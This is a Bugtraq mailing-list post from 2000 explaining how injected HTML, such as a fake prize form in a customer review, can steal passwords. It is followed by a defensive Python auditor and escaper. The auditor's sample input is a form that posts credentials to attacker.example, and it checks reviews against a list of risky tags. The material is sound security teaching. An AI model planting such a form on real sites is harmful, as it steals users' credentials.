Bugtraq mailing list archives
Re: Fwd: CERT Advisory CA-2000-02
From: regs () NEBCORP COM (Ari Gordon-Schlosberg)
Date: Thu, 3 Feb 2000 14:17:12 -0600
[Shockro () AOL COM]
I'm curious as to how this could be used in a malicious manner, as opposed to just being an annoyance. I mean, god forbid, people should execute arbitrary javascript on us. Yes, we've all seen the file upload form exploit and the 1001 ways to crash Internet Explorer through infinite loops, but there's nothing seriously harmful about this, am I right? Please correct me if I'm wrong.
Yes, you are wrong. :) Let me explain: the javascript issue is not a huge one, although there are some issues. I don't know enough about javascript to get into it.

I think the best example of where this could be a problem would be on a site like amazon.com. If I can inject HTML into my customer review, I can start reaping passwords or credit card numbers. By studying the format of the amazon HTML, I can make it look like I inserted some sort of prize form into the web page: I ask for their username and password and they press submit... that then posts to a cgi on my server. Boom! I have their account. Or I embed an applet, the net result being the same.

This is a real issue. Basically, it boils down to the fact that most users will assume that any HTML/Applet/form/script that shows up on a foo.com webpage was authored by someone at foo.com, and any information that they send via their web browser will be going to and only to foo.com. Injection of an attacker's HTML into a foo.com webpage can exploit this assumption to steal sensitive information.

--
Ari                                                 there is no spoon
-------------------------------------------------------------------------
http://www.nebcorp.com/~regs/pgp                   for PGP public key
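The scenario in the message above, seen from the defending site's side, as an added example that is not part of the original post: it audits a stored review for markup that can collect or send data, flags targets outside the site, and renders the review with output encoding so the browser shows it as text. The host `foo.com` comes from the message; the sample review, `attacker.example`, and the function names are constructed for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "foo.com"  # assumption: the site's own host, as named in the message

# Constructed sample review: a form styled to look native that posts off-site.
REVIEW = ('Great book! <form action="http://attacker.example/cgi-bin/collect" '
          'method="post">Win a prize! Username: <input name="user"> '
          'Password: <input type="password" name="pass">'
          '<input type="submit"></form>')


class ActiveContentFinder(HTMLParser):
    """Collects tags in user-supplied text that can collect or send data."""
    RISKY = {"form", "input", "applet", "script", "iframe", "object", "embed"}

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.RISKY:
            return
        a = dict(attrs)
        target = a.get("action") or a.get("src") or a.get("code") or ""
        host = urlparse(target).hostname
        # Exact-host comparison: anything that names another host is off-site.
        offsite = host is not None and host != SITE_HOST
        self.findings.append((tag, target, offsite))


def audit_review(text):
    """Return (tag, target, offsite) for each risky tag found in a review."""
    finder = ActiveContentFinder()
    finder.feed(text)
    finder.close()
    return finder.findings


def render_review(text):
    """Encode user text so it is displayed as text, never parsed as markup."""
    return '<div class="review">' + html.escape(text, quote=True) + "</div>"


if __name__ == "__main__":
    for finding in audit_review(REVIEW):
        print(finding)
    print(render_review(REVIEW))
```

The audit is useful for finding reviews already stored with markup in them; the encoding in `render_review` is what removes the problem, because the browser never sees a form to submit.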